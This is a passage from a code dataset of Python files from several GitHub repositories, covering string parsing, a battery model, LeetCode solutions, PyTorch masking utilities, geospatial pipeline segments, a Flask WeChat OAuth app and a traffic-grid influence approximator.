Raises a ValueError if there are\n unmatched quotes.\n\n Both the first and last entry are unquoted, but might be empty, and\n therefore the length of the resulting list must be an odd number.\n \"\"\"\n result = []\n for part in s.split(QUOTE):\n if result and result[-1].endswith('\\\\'):\n result[-1] = result[-1] + QUOTE + part\n else:\n result.append(part)\n\n if not len(result) % 2:\n raise ValueError('Unmatched quote.')\n\n return result\n\n\ndef process_unquoted(s, sub):\n \"\"\"Splits a string into unquoted and quoted segments, applies a substitution\n function to the unquoted segments only, and joins it back together again.\n \"\"\"\n def gen():\n *parts, last = split_quoted(s)\n for unquoted, quoted in zip(*([iter(parts)] * 2)):\n yield sub(unquoted)\n yield QUOTE + quoted + QUOTE\n yield sub(last)\n\n return ''.join(gen())\n","repo_name":"timedata-org/expressy","sub_path":"expressy/quotes.py","file_name":"quotes.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12393797235","text":"from battery_spm_inputs import *\r\nimport numpy as np\r\n\r\n# Calculate double layer initial conditions:\r\nphi_dl_an_0 = phi_an_0 - phi_sep_0\r\nphi_dl_ca_0 = phi_ca_0 - phi_sep_0\r\n\r\n# Calculate the total storage capacity of each electrode, per unit area\r\n# (specific capacity times electrode active material mass)\r\ncapacity_anode = capacity_graphite*H_an*eps_graphite*density_graphite\r\ncapacity_cathode = capacity_LCO*H_ca*eps_LCO*density_LCO\r\n# Actual battery capacity is the minimum of these two\r\ncapacity_area = min(capacity_anode,capacity_cathode)\r\n\r\n# Integration time is 3600 seconds per hour, divide by charges per hour.\r\n# We multiply this by a \"charge fraction,\" as we do not want to charge or \r\n# discharge the battery all the way (dPhi_eq would go to plus/minus infinity!)\r\nt_final = charge_frac*3600./C_rate\r\n\r\n# Initial solution vector:\r\nSV_0 = np.array([phi_dl_an_0, T_amb, T_amb, phi_dl_ca_0, T_amb])\r\n\r\n# Create class to point to the correct variable locations in the SV:\r\nclass ptr:\r\n phi_an = 0\r\n T_an = 1\r\n\r\n T_elyte = 2\r\n\r\n phi_ca = 3\r\n T_ca = 4\r\n\r\n# Load inputs and other parameters into 'pars' class:\r\n\r\n#Preparatory calculations that we don't want stored in 'pars':\r\n# Volume- and mass-weighted average density and Cp, respectively:\r\nrho_avg_an = eps_graphite*density_graphite + (1-eps_graphite)*density_elyte\r\nmassfrac_graphite = eps_graphite*density_graphite/rho_avg_an\r\nCp_avg_an = massfrac_graphite*Cp_graphite + (1 - massfrac_graphite)*Cp_elyte\r\n\r\nrho_avg_ca = eps_LCO*density_LCO + (1-eps_LCO)*density_elyte\r\nmassfrac_LCO = eps_LCO*density_LCO/rho_avg_ca\r\nCp_avg_ca = massfrac_LCO*Cp_LCO + (1 - eps_LCO)*Cp_elyte\r\nclass pars:\r\n # Component thicknesses:\r\n H_an = H_an\r\n H_elyte = H_elyte\r\n H_ca = H_ca\r\n\r\n # Equilibrium double layer potentials (V)\r\n # Assume fixed (for now!)\r\n dPhi_eq_an = dPhi_eq_an\r\n dPhi_eq_ca = dPhi_eq_ca\r\n\r\n # Butler-Volmer parameters:\r\n i_o_an = i_o_an\r\n n_an = n_an\r\n beta_an = beta_an\r\n\r\n i_o_ca = i_o_ca\r\n n_ca = n_ca\r\n beta_ca = beta_ca\r\n \r\n # Double layer capacitances (F/m2)\r\n C_dl_an_inv = 1/C_dl_an\r\n C_dl_ca_inv = 1/C_dl_ca\r\n\r\n # Lithium enthalpies (J/mol)\r\n h_Li_an = h_Li_an\r\n h_Li_elyte = h_Li_elyte\r\n h_Li_ca = h_Li_ca\r\n\r\n # External current density:\r\n C_rate = C_rate\r\n i_ext = C_rate*capacity_area\r\n\r\n # Total geometric area 
per unit surface area:\r\n A_fac_an = r_p_an/3/H_an/eps_graphite\r\n A_fac_ca = r_p_ca/3/H_ca/eps_LCO\r\n\r\n # Inverse of mass density times specific heat capacity:\r\n RhoCpInv_an = 1/rho_avg_an/Cp_avg_an\r\n RhoCpInv_elyte = 1/density_elyte/Cp_elyte\r\n RhoCpInv_ca = 1/rho_avg_ca/Cp_avg_ca\r\n \r\n # Volume-averaged thermal conductivities:\r\n lambda_cond_an = (eps_graphite*lambda_cond_an \r\n + (1-eps_graphite)*lambda_cond_elyte)\r\n lambda_cond_elyte = lambda_cond_elyte\r\n lambda_cond_ca = (eps_LCO*lambda_cond_ca \r\n + (1-eps_LCO)*lambda_cond_elyte)\r\n\r\n # Electronic and ionic resistivities (ohm-m):\r\n R_el_an = 1/sigma_el_graphite/eps_graphite\r\n R_io_an = 1/sigma_io_elyte/(1-eps_graphite)\r\n R_io_elyte = 1/sigma_io_elyte/eps_elyte_sep\r\n R_io_ca = 1/sigma_io_elyte/(1-eps_LCO)\r\n R_el_ca = 1/sigma_el_LCO/eps_LCO\r\n\r\n # Emmissivity:\r\n emmissivity = emmissivity\r\n # Ambient temperature:\r\n T_amb = T_amb\r\n # Convection coefficient:\r\n h_conv = h_conv\r\n # Battery external surface area per unit volume:\r\n A_ext = A_ext\r\n\r\n#","repo_name":"liamwitteman/homework-6","sub_path":"battery_spm_init.py","file_name":"battery_spm_init.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12658859207","text":"# Problem: https://leetcode.com/problems/shortest-path-in-binary-matrix/description/\nclass Solution:\n def isBound(self, x, y, n):\n return x >= 0 and x <= n - 1 and y >= 0 and y <= n - 1\n def shortestPathBinaryMatrix(self, grid: List[List[int]]) -> int:\n n = len(grid)\n if grid[0][0] == 1 or grid[n - 1][n - 1] == 1:\n return -1\n \n dirs = [(1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1), (0, 1), (1, 1)] # 8 - directions\n queue = []\n queue.append((0, 0))\n grid[0][0] = 1\n while len(queue) > 0:\n _x, _y = queue.pop(0)\n if _x == n - 1 and _y == n - 1:\n return grid[_x][_y]\n for _newx, _newy in dirs: # move to each directions\n _newposx = _x + _newx\n _newposy = _y + _newy\n if self.isBound(_newposx, _newposy, n) and grid[_newposx][_newposy] == 0:\n queue.append((_newposx, _newposy)) # append suitable position to queue\n grid[_newposx][_newposy] = grid[_x][_y] + 1\n return -1\n","repo_name":"thanhdxuan/Leetcode-DailyChallenge","sub_path":"June2023/01_shortestPathBinaryMatrix.py","file_name":"01_shortestPathBinaryMatrix.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17666686944","text":"\"\"\"\n{\n \"difficulty\": \"medium\",\n \"link\": \"https://leetcode.com/problems/combination-sum-ii/description/\",\n \"category\": [\"DFS\"],\n \"tags\": [\"backtracking\"],\n \"questions\": []\n}\n\"\"\"\n\n\"\"\"\n思路:\n\t- 因为是组合,不能重复,所以需要对candidates排序\n\t- 每次递归遇到相同元素需要略过,即同一元素只能递归一次\n\t- 递归时只要被选择元素后面的元素\n\"\"\"\n\ndef DFS(candidates, target, currSelection, lst):\n if target == 0:\n lst.append(currSelection)\n return\n \n for idx,candidate in enumerate(candidates):\n if candidate > target:\n break\n if idx > 0 and candidate == lastCandidate:\n continue\n lastCandidate = candidate\n DFS(candidates[idx+1:], target-candidate, currSelection+[candidate], lst)\n\nclass Solution:\n def combinationSum2(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n candidates.sort()\n lst = []\n DFS(candidates, target, [], lst)\n return 
lst","repo_name":"DanqiChang/leetcode-notes","sub_path":"solutions/40.py","file_name":"40.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35782047971","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch import Tensor\nfrom typing import Dict, Iterable, Callable\nfrom collections import OrderedDict\nfrom circuit_explorer.utils import TargetReached, params_2_target_from_scores\nimport types\nfrom copy import deepcopy\n\n\n#### MASKS #####\n'''\nFunctions for masking the network, given scores\n'''\n\ndef mask_from_scores(scores, sparsity=None,num_params_to_keep=None,model = None,unit=None,target_layer=None,relevant_sparsity=True,flip_mask=False):\n\t'''\n\trelevant sparsity: the sparsity given is with respect to 'relevant' parameters\n\t'''\n\tassert not ((sparsity is None) and (num_params_to_keep is None))\n\n\tkeep_masks = OrderedDict()\n\t\n\t#flatten\n\tscores_flat = torch.cat([torch.flatten(x) for x in scores.values()])\n\tnorm_factor = torch.sum(abs(scores_flat))\n\tscores_flat.div_(norm_factor)\n\n\t#num kept params\n\tif not num_params_to_keep is None:\n\t\tk = num_params_to_keep\n\telif relevant_sparsity:\n\t\tassert not (model is None or unit is None or target_layer is None)\n\t\ttotal_params = params_2_target_from_scores(scores,unit,target_layer,model)\n\t\tk = int(total_params * sparsity)\n\telse:\n\t\ttotal_params = len(scores_flat)\n\t\tk = int(total_params * sparsity)\n\n\t#get threshold score\n\tthreshold, _ = torch.topk(scores_flat, k, sorted=True)\n\tacceptable_score = threshold[-1]\n\n\n\t\n\tif acceptable_score == 0:\n\t\tprint('gradients from this feature are sparse, the minimum acceptable score at this sparsity has a score of zero! 
we will return a mask thats smaller than you asked, by masking all parameters with a score of zero.')\n\n\tfor layer_name in scores:\n\t\tlayer_scores = scores[layer_name]\n\t\tif flip_mask:\n\t\t\tkeep_masks[layer_name] = 1 - (layer_scores / norm_factor > acceptable_score).float()\n\t\telse:\n\t\t\tkeep_masks[layer_name] = (layer_scores / norm_factor > acceptable_score).float()\n\t\n\n\n\treturn keep_masks\n\n\ndef masked_conv2d_forward(self, x):\n\n\t#pass input through conv and weight mask\n\n\tx = F.conv2d(x, self.weight * self.weight_mask, self.bias,\n\t\t\t\t\tself.stride, self.padding, self.dilation, self.groups) \n\n\treturn x\n\ndef masked_linear_forward(self, x):\n\n\tx = F.linear(x, self.weight * self.weight_mask, self.bias)\n\n\treturn x\n\ndef setup_net_for_mask(model):\n\n\t#same naming trick as before \n\tlayers = OrderedDict([*model.named_modules()])\n\n\tfor layer in layers.values():\n\t\tif isinstance(layer, nn.Conv2d):\n\t\t\tlayer.weight_mask = nn.Parameter(torch.ones_like(layer.weight))\n\t\t\tlayer.forward = types.MethodType(masked_conv2d_forward, layer)\n\t\telif isinstance(layer, nn.Linear):\n\t\t\tlayer.weight_mask = nn.Parameter(torch.ones_like(layer.weight))\n\t\t\tlayer.forward = types.MethodType(masked_linear_forward, layer)\n\t\t\t\ndef apply_mask(model,mask, zero_absent=True):\n\n\tlayers = OrderedDict([*model.named_modules()])\n\tsetup_net_for_mask(model)\n\n\t#mask may be structured, lets 'expand' it before applying it to the model\n\texpanded_mask = expand_structured_mask(mask,model)\n\n\tfor layer_name in expanded_mask:\n\t\tlayers[layer_name].weight_mask = nn.Parameter(expanded_mask[layer_name].to(layers[layer_name].weight.device))\n\tif zero_absent:\n\t\t#mask all layers not specified in the mask\n\t\tfor layer_name in layers:\n\t\t\tif layer_name not in expanded_mask.keys():\n\t\t\t\ttry:\n\t\t\t\t\tlayers[layer_name].weight_mask = nn.Parameter(torch.zeros_like(layers[layer_name].weight))\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\n\n\ndef expand_structured_mask(mask,model):\n\t'''Structured mask might have shape (filter, channel) for kernel structured mask, but the weights have\n\t\tshape (filter,channel,height,width), so we make a new weight wise mask based on the structured mask'''\n\n\tlayers = OrderedDict([*model.named_modules()])\n\texpanded_mask = OrderedDict()\n\n\tfor layer_name, layer_mask in mask.items():\n\t\tw = layers[layer_name].weight\n\t\tm = deepcopy(layer_mask)\n\t\twhile len(m.shape) < len(w.shape):\n\t\t\tm = m.unsqueeze(dim=-1)\n\t\tm = m.expand(w.shape)\n\t\texpanded_mask[layer_name] = m\n\t\n\treturn expanded_mask\n\n\ndef structured_mask_from_mask(mask, structure = 'kernels'):\n\t\n\tif isinstance(mask,dict):\n\t\tlayer_keys = list(mask.keys())\n\t\tmask_list = []\n\t\tfor i in mask:\n\t\t\tmask_list.append(mask[i])\n\t\tmask = mask_list\n\n\tif structure == 'weights':\n\t\traise ValueError(\"to create a weight mask use the function circuit_pruner.force.expand_structured_mask\")\n\tif structure not in ['kernels','edges','filters','nodes']:\n\t\traise ValueError(\"Argument 'structure' must be in ['weights','kernels','edges','filters','nodes']\")\n\n\n\n\tif len(mask[0].shape) == 4:\n\t\tin_structure = 'weights'\n\telif len(mask[0].shape) == 2:\n\t\tin_structure = 'kernels'\n\telif len(mask[0].shape) == 1:\n\t\tin_structure = 'filters'\n\telse:\n\t\traise ValueError(\"Dont understand Shape %s of input mask, must be 1,2 or 4 (filters,kernels,weights)\"%str(len(mask[0].shape)))\n\n\tif in_structure == structure:\n\t\tprint('provided mask 
already of structure %s'%structure)\n\t\treturn mask\n\n\tout_mask = []\n\n\tfor m in mask:\n\t\tif structure in ['filters','nodes']:\n\t\t\tm_flat = torch.reshape(m,(m.shape[0],-1))\n\t\t\tz = torch.zeros(m_flat.shape[1])\n\t\t\tm_out = ~torch.all(m_flat==z,dim=1)\n\n\t\telse:\n\t\t\tm_flat = torch.reshape(m,(m.shape[0]*m.shape[1],-1))\n\t\t\tz = torch.zeros(m_flat.shape[1])\n\t\t\tm_out = ~torch.reshape(torch.all(m_flat==z,dim=1),(m.shape[0],m.shape[1]))\n\n\t\tm_out= m_out.type(torch.FloatTensor)\n\t\tout_mask.append(m_out)\n\n\n\tout_mask_dict = OrderedDict()\n\tfor i in range(len(out_mask)):\n\t\tout_mask_dict[layer_keys[i]] = out_mask[i]\n\n\treturn out_mask\n\n\n\n\ndef mask_intersect_over_union(mask1,mask2):\n\tiou = {}\n\tfor layer_name in mask1:\n\t\ttry:\n\t\t\tintersect_mask = mask1[layer_name]*mask2[layer_name]\n\t\t\tunion_mask = torch.ceil((mask1[layer_name]+mask2[layer_name])/2)\n\t\t\tiou[layer_name] = (torch.sum(intersect_mask)/torch.sum(union_mask))\n\t\texcept:\n\t\t\tprint('skipping %s'%layer_name)\n\t\t\tcontinue\n\treturn iou\n\n","repo_name":"chrishamblin7/circuit_explorer","sub_path":"circuit_explorer/mask.py","file_name":"mask.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"18742092389","text":"import geopandas as gpd\nimport pandas as pd\nimport shapely.geometry\nimport shapely.wkt\n\nfrom .pipesegment import PipeSegment, LoadSegment, MergeSegment\nfrom ..vector.polygon import convert_poly_coords\n\n\nclass LoadString(LoadSegment):\n \"\"\"\n Load a string from a file.\n \"\"\"\n def __init__(self, pathstring):\n super().__init__()\n self.pathstring = pathstring\n def load(self):\n infile = open(self.pathstring, 'r')\n content = infile.read()\n infile.close()\n return content\n\n\nclass SaveString(PipeSegment):\n \"\"\"\n Write a string to a file.\n \"\"\"\n def __init__(self, pathstring, append=False):\n super().__init__()\n self.pathstring = pathstring\n self.append = append\n def transform(self, pin):\n mode = 'a' if self.append else 'w'\n outfile = open(self.pathstring, mode)\n outfile.write(str(pin))\n outfile.close()\n return pin\n\n\nclass ShowString(PipeSegment):\n \"\"\"\n Print a string to the screen.\n \"\"\"\n def transform(self, pin):\n print(pin)\n return pin\n\n\nclass LoadDataFrame(LoadSegment):\n \"\"\"\n Load a GeoPandas GeoDataFrame from a file.\n \"\"\"\n def __init__(self, pathstring, geom_col='geometry', projection=None):\n super().__init__()\n self.pathstring = pathstring\n self.geom_col = geom_col\n self.projection = projection\n def load(self):\n if self.pathstring.lower()[-4:] == '.csv':\n df = pd.read_csv(self.pathstring)\n geometry = df.apply(lambda row:\n shapely.wkt.loads(row[self.geom_col]), axis=1)\n df.drop(columns=[self.geom_col])\n gdf = gpd.GeoDataFrame(df, geometry=geometry)\n if self.projection is not None:\n gdf.crs = 'epsg:' + str(self.projection)\n return gdf\n else:\n return gpd.read_file(self.pathstring)\n\n\nclass SaveDataFrame(PipeSegment):\n \"\"\"\n Save a GeoPandas GeoDataFrame to disk.\n \"\"\"\n def __init__(self, pathstring, driver='GeoJSON'):\n super().__init__()\n self.pathstring = pathstring\n self.driver = driver\n def transform(self, pin):\n pin.to_file(self.pathstring, driver=self.driver)\n return pin\n\n\nclass ShowDataFrame(PipeSegment):\n \"\"\"\n Print a GeoPandas GeoDataFrame to the screen.\n \"\"\"\n def transform(self, pin):\n print(pin)\n return pin\n\n\nclass 
ReprojectDataFrame(PipeSegment):\n \"\"\"\n Reproject a GeoPandas GeoDataFrame.\n \"\"\"\n def __init__(self, projection=3857):\n super().__init__()\n self.projection = projection\n def transform(self, pin):\n return pin.to_crs('epsg:' + str(self.projection))\n\n\nclass ExplodeDataFrame(PipeSegment):\n \"\"\"\n Given a GeoPandas GeoDataFrame, break multi-part geometries\n into multiple lines.\n \"\"\"\n def transform(self, pin):\n return pin.explode().reset_index()\n\n\nclass IntersectDataFrames(PipeSegment):\n \"\"\"\n Given an iterable of GeoPandas GeoDataFrames, returns their intersection\n \"\"\"\n def __init__(self, master=0):\n super().__init__()\n self.master = master\n def transform(self, pin):\n result = pin[self.master]\n for i, gdf in enumerate(pin):\n if not i==self.master:\n result = gpd.overlay(result, gdf)\n result.crs = pin[self.master].crs\n return result\n\n\n#class DataFrameToMask(PipeSegment):\n# \"\"\"\n# Given a GeoPandas GeoDataFrame and an Image-class image,\n# convert the DataFrame to the corresponding Boolean mask\n# \"\"\"\n# pass\n#\n#\n#class MaskToDataFrame(PipeSegment):\n# \"\"\"\n# Given a boolean mask, convert it to a GeoPandas GeoDataFrame of polygons.\n# \"\"\"\n# pass\n\n\nclass DataFramePixelCoords(PipeSegment):\n \"\"\"\n Given a GeoPandas GeoDataFrame, converts between georeferenced\n coordinates and pixel coordinates. Assumes image has affine geotransform.\n \"\"\"\n def __init__(self, inverse=False, reverse_order=False, *args, **kwargs):\n super().__init__()\n self.inverse = inverse\n self.reverse_order = reverse_order\n self.args = args\n self.kwargs = kwargs\n def transform(self, pin):\n if not self.reverse_order:\n gdf = pin[0]\n img = pin[1]\n else:\n gdf = pin[1]\n img = pin[0]\n affine = img.metadata['geotransform']\n gdf = gdf.copy()\n newgeoms = gdf.apply(lambda row: convert_poly_coords(\n row.geometry, affine_obj=affine, inverse=self.inverse,\n *self.args, **self.kwargs\n ), axis=1)\n gdf.geometry = newgeoms\n return gdf\n\n\nclass DataFrameToString(PipeSegment):\n \"\"\"\n Given a GeoPandas GeoDataFrame, convert it into a GeoJSON string.\n Caveat emptor: This follows the GeoJSON 2016 standard, which does\n not include any coordinate reference system information.\n \"\"\"\n def __init__(self, crs=True, **kwargs):\n super().__init__()\n self.crs = crs\n self.kwargs = kwargs\n def transform(self, pin):\n geojson = pin.to_json(**(self.kwargs))\n if self.crs:\n geojson = '{\"type\": \"FeatureCollection\", \"crs\": { \"type\": \"name\", \"properties\": { \"name\": \"urn:ogc:def:crs:EPSG::' \\\n + str(pin.crs.to_epsg()) \\\n + '\" } }, ' \\\n + geojson[30:]\n return geojson\n\n\nclass BoundsToDataFrame(PipeSegment):\n \"\"\"\n Given a set of tile bounds [left, lower, right, upper],\n convert it to a GeoPandas GeoDataFrame. 
Note: User must\n specify projection, since a simple set of bounds doesn't\n include that.\n \"\"\"\n def __init__(self, projection=None):\n super().__init__()\n self.projection = projection\n def transform(self, pin):\n gdf = gpd.GeoDataFrame()\n if self.projection is not None:\n gdf.crs = 'epsg:' + str(self.projection)\n gdf.loc[0, 'geometry'] = shapely.geometry.box(*pin)\n return gdf\n","repo_name":"CosmiQ/solaris","sub_path":"solaris/preproc/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","stars":402,"dataset":"github-code","pt":"61"} +{"seq_id":"37301099168","text":"from flask import current_app, render_template, redirect, flash, request,\\\n url_for, abort, make_response\nfrom app.flow import flow\nfrom app.flow.models import UserInfo\nfrom app import db, csrf\nfrom app.wechat.wechat_api import get_access_token_by_code,\\\n get_userinfo, auth_url\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\n\nfrom datetime import datetime\n\nimport uuid\nimport sys\nimport re\nreload(sys)\nsys.setdefaultencoding('utf8')\ncookies_dump_time = 24 * 60 * 60\nPHONE_PATTERN = re.compile(r'^1[0-9]{10}$')\n\n\n@csrf.exempt\n@flow.route('/flow/index/')\ndef flow_index():\n chn = request.args.get('chn', None)\n if current_app.config['OPEN_COUNT'] and chn:\n current_app.logger.info(\n 'chn:%s, ip:%s, actions:index' % (chn, request.remote_addr)\n )\n\n cookie_key = request.cookies.get(current_app.config['COOKIE_NAME'])\n cookie_data = cookies_loads(cookie_key)\n uid = None\n if cookie_data:\n uid = cookie_data.get('uid', None)\n if uid:\n user_info = UserInfo.query.filter(UserInfo.uid == uid).first()\n if user_info:\n return redirect(\n url_for('flow.click_get_flow', uid=uid, _external=True)\n )\n\n url = auth_url(\n current_app.config['APPID'],\n url_for('flow.flow_auth', _external=True),\n chn\n )\n return redirect(url)\n\n\n@csrf.exempt\n@flow.route('/flow/index/auth/')\ndef flow_auth():\n code = request.args.get('code', None)\n state = request.args.get('state', None)\n chn = state\n if current_app.config['OPEN_COUNT'] and chn:\n current_app.logger.info('chn:%s, ip:%s, actions:auth' % (\n chn,\n request.remote_addr\n ))\n\n if not code:\n return \"请授权\"\n\n token_msg = get_access_token_by_code(\n current_app.config['APPID'],\n current_app.config['WECHAT_SECRET'],\n code\n )\n # current_app.logger.info(str(token_msg))\n if 'e' in token_msg:\n current_app.logger.info(token_msg['e'])\n return '服务器连接错误'\n\n if 'errmsg' in token_msg:\n current_app.logger.info(token_msg['errmsg'])\n return token_msg['errmsg']\n\n access_token = token_msg['access_token']\n openid = token_msg['openid']\n expires_in = token_msg['expires_in']\n refresh_token = token_msg['refresh_token']\n scope = token_msg['scope']\n user_info = UserInfo.query.filter(UserInfo.openid == openid).first()\n uid = None\n if user_info:\n uid = user_info.uid\n else:\n userinfo_msg = get_userinfo(access_token, openid)\n if 'e' in userinfo_msg:\n current_app.logger.info(userinfo_msg['e'])\n return '服务器连接错误'\n\n if 'errmsg' in token_msg:\n current_app.logger.info(userinfo_msg['errmsg'])\n return userinfo_msg['errmsg']\n\n uid = str(uuid.uuid1()).replace('-', '')\n user_info = UserInfo()\n user_info.openid = userinfo_msg['openid']\n user_info.province = userinfo_msg['province']\n user_info.headimgurl = userinfo_msg['headimgurl']\n user_info.city = userinfo_msg['city']\n user_info.country = userinfo_msg['country']\n user_info.sex = userinfo_msg['sex']\n 
user_info.nickname = userinfo_msg['nickname']\n user_info.create_time = datetime.now()\n user_info.uid = uid\n user_info.mobile = 'o'\n db.session.add(user_info)\n db.session.commit()\n # current_app.logger.info(str(userinfo_msg))\n\n if uid:\n cookie_data = cookies_dumps({'uid': uid}, cookies_dump_time)\n response = make_response(redirect(url_for('flow.click_get_flow', uid=uid, _external=True)))\n response.set_cookie(\n current_app.config['COOKIE_NAME'],\n value=cookie_data,\n max_age=cookies_dump_time\n )\n return response\n else:\n return \"授权失败,请重试!\"\n\n\n@csrf.exempt\n@flow.route('/flow/index/click_get_flow/')\ndef click_get_flow():\n uid = request.args.get('uid')\n if uid:\n user_info = UserInfo.query.filter(UserInfo.uid == uid).first()\n if user_info:\n pass\n else:\n return '非授权用户'\n else:\n return '参数错误'\n\n return render_template('index_1.html', uid=uid)\n\n\n@flow.route('/flow/index/mobile/', methods=['GET', 'POST'])\ndef get_mobile():\n if request.method == 'GET':\n uid = request.args.get('uid')\n if uid:\n user_info = UserInfo.query.filter(UserInfo.uid == uid).first()\n if user_info:\n if user_info.mobile == 'o':\n return render_template('index_2.html', uid=uid)\n else:\n flow = get_flow_ans(user_info.uid)\n return render_template('index_3.html', flow=flow)\n else:\n abort(404)\n else:\n abort(404)\n elif request.method == 'POST':\n uid = request.form.get('uid')\n mobile = request.form.get('mobile')\n user = UserInfo.query.filter(UserInfo.uid == uid).first()\n if user:\n if user.mobile != 'o':\n # flash('已经填写过了手机')\n flow = get_flow_ans(user.uid)\n return render_template('index_3.html', flow=flow)\n else:\n if check_mobile(mobile):\n user.mobile = mobile\n db.session.add(user)\n db.session.commit()\n flow = get_flow_ans(user.uid)\n return render_template('index_3.html', flow=flow)\n else:\n flash(\"手机格式错误\")\n else:\n return flash(\"非授权用户\")\n\n return render_template('index_2.html', uid=uid)\n\n\ndef cookies_dumps(data, expires_in):\n s = Serializer(current_app.config['SECRET_KEY'], expires_in=expires_in)\n return s.dumps(data)\n\n\ndef cookies_loads(cookie):\n s = Serializer(current_app.config['SECRET_KEY'])\n try:\n data = s.loads(cookie)\n return data\n except:\n return None\n\n\ndef check_mobile(mobile):\n if mobile and PHONE_PATTERN.match(mobile):\n return True\n return False\n\n\ndef get_flow_ans(uid):\n # flow = get_rand_flow()\n return flow\n","repo_name":"xym2010/wechat_lottery","sub_path":"app/flow/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31113622906","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n    path('signup/', views.signup, name='signup'),\n    path('signin/', views.signin, name='signin'),\n    path('logout/', views.logout, name='logout'),\n    path('otherprofile//', views.other_profile, name='other_profile'),\n    path('', views.userAccount, name='profile'),\n]","repo_name":"adil-shabab/behance-clone","sub_path":"behance/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"23394920891","text":"def is_palindrome(string):\r\n    \"\"\" (string) -> bool\r\n    Return true if string is a palindrome\r\n\r\n    >>> is_palindrome(\"a\")\r\n    True\r\n\r\n    >>> is_palindrome(\"abc\")\r\n    False\r\n\r\n    >>> is_palindrome(\"aba\")\r\n    True\r\n    \"\"\"\r\n    if len(string) == 0:\r\n        return False\r\n    if len(string) == 1:\r\n        return True\r\n    if len(string) == 2 or len(string) == 3:\r\n        return string[0] == string[-1]\r\n\r\n    return is_palindrome(string[1:-1])
\r\n\r\n\r\ndef fair_and_sqare(A, B):\r\n    \"\"\" (num, num) -> int\r\n    For numbers between A and B return the number of fair and square\r\n    numbers (number is a palindrome and its square root is a palindrome)\r\n    greater than or equal to A and smaller than or equal to B.\r\n\r\n    >>> fair_and_sqare(1, 4)\r\n    2\r\n\r\n    >>> fair_and_sqare(10, 120)\r\n    0\r\n\r\n    >>> fair_and_sqare(100, 1000)\r\n    2\r\n    \"\"\"\r\n    counter = 0\r\n    for i in range(A, B+1):\r\n        if is_palindrome(str(i)):\r\n            root = i**0.5\r\n            if root == int(root) and is_palindrome(str(int(root))):\r\n                counter += 1\r\n    return counter\r\n\r\nif __name__ == '__main__':\r\n    in_f = open(\"input.txt\", \"r\")\r\n    out_f = open(\"output.txt\", \"w\")\r\n    test_cases = int(in_f.readline())\r\n    for case in range(test_cases):\r\n        limits = in_f.readline().split()\r\n        result = fair_and_sqare(int(limits[0]), int(limits[1]))\r\n        out_f.write(\"Case #%d: %d\\n\" % (case+1, result))\r\n\r\n    in_f.close()\r\n    out_f.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/2505.py","file_name":"2505.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28431380933","text":"#%%\r\ndef my_busqueda (lista, e):\r\n    aux = -1\r\n    for i in range(len(lista)):\r\n        if lista[i] == e:\r\n            aux = i\r\n    return aux
\r\n\r\n#%%\r\ndef busqueda_lineal(lista, e):\r\n\r\n    pos = -1 # start by assuming e is not in the list\r\n    for i, z in enumerate(lista): # iterate over the list\r\n        if z == e: # if we find e\r\n            pos = i # save its position\r\n            break # and exit the loop\r\n    return pos\r\n#%%\r\nlista = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\ne = 5\r\nindicie = busqueda_lineal(lista, e)\r\nprint(indicie)\r\n# %%\r\n","repo_name":"lpangaro/python-UNSAM","sub_path":"Notas/ejercicios_python/Clase04/otros/Buscar.py","file_name":"Buscar.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43498837582","text":"import numpy as np\nimport os\nfrom environments.TrafficGrid.prediction import model\nimport pylab\nimport pandas as pd\nfrom environments.TrafficGrid.IALM import IALM\nfrom environments.TrafficGrid.utility import generate_d_set\n\nnp.random.seed(42)\n\nclass Approximator(object):\n\n    def __init__(self, env, parameters, policies):\n\n        self.parameters=parameters\n        self.env=env\n        self.D=self.generate_d_set()\n        self.policies=policies\n    \n\n    def 
train(self):\n n_epochs=self.parameters['n_epochs']\n batch_size=self.parameters['batch_size']\n n_iter=self.parameters['n_iter']\n #frac_epochs=self.parameters['frac_epochs']\n\n # Create the dataset (n_iter x hor x dimension of d_set) and the labels (n_iter x hor)\n data=self.env.extract_d_set()\n labels=self.env.extract_sources_influence()\n \n self.model = model(self.parameters)\n \n data=np.array(data)\n labels=np.array(labels)\n\n #Select randomly train_test_split of the experience as train set and the rest as test set\n indexes=np.arange(len(data))\n np.random.shuffle(indexes)\n indexes_train=indexes[:int(self.parameters['train_test_split']*n_iter)]\n indexes_test=indexes[int(self.parameters['train_test_split']*n_iter):]\n\n train_x = data[indexes_train]\n train_lab = labels[indexes_train]\n\n test_x = data[indexes_test]\n test_lab = labels[indexes_test]\n\n total_batches = len(train_x) // batch_size\n loss = np.zeros(n_epochs)\n\n for epoch in 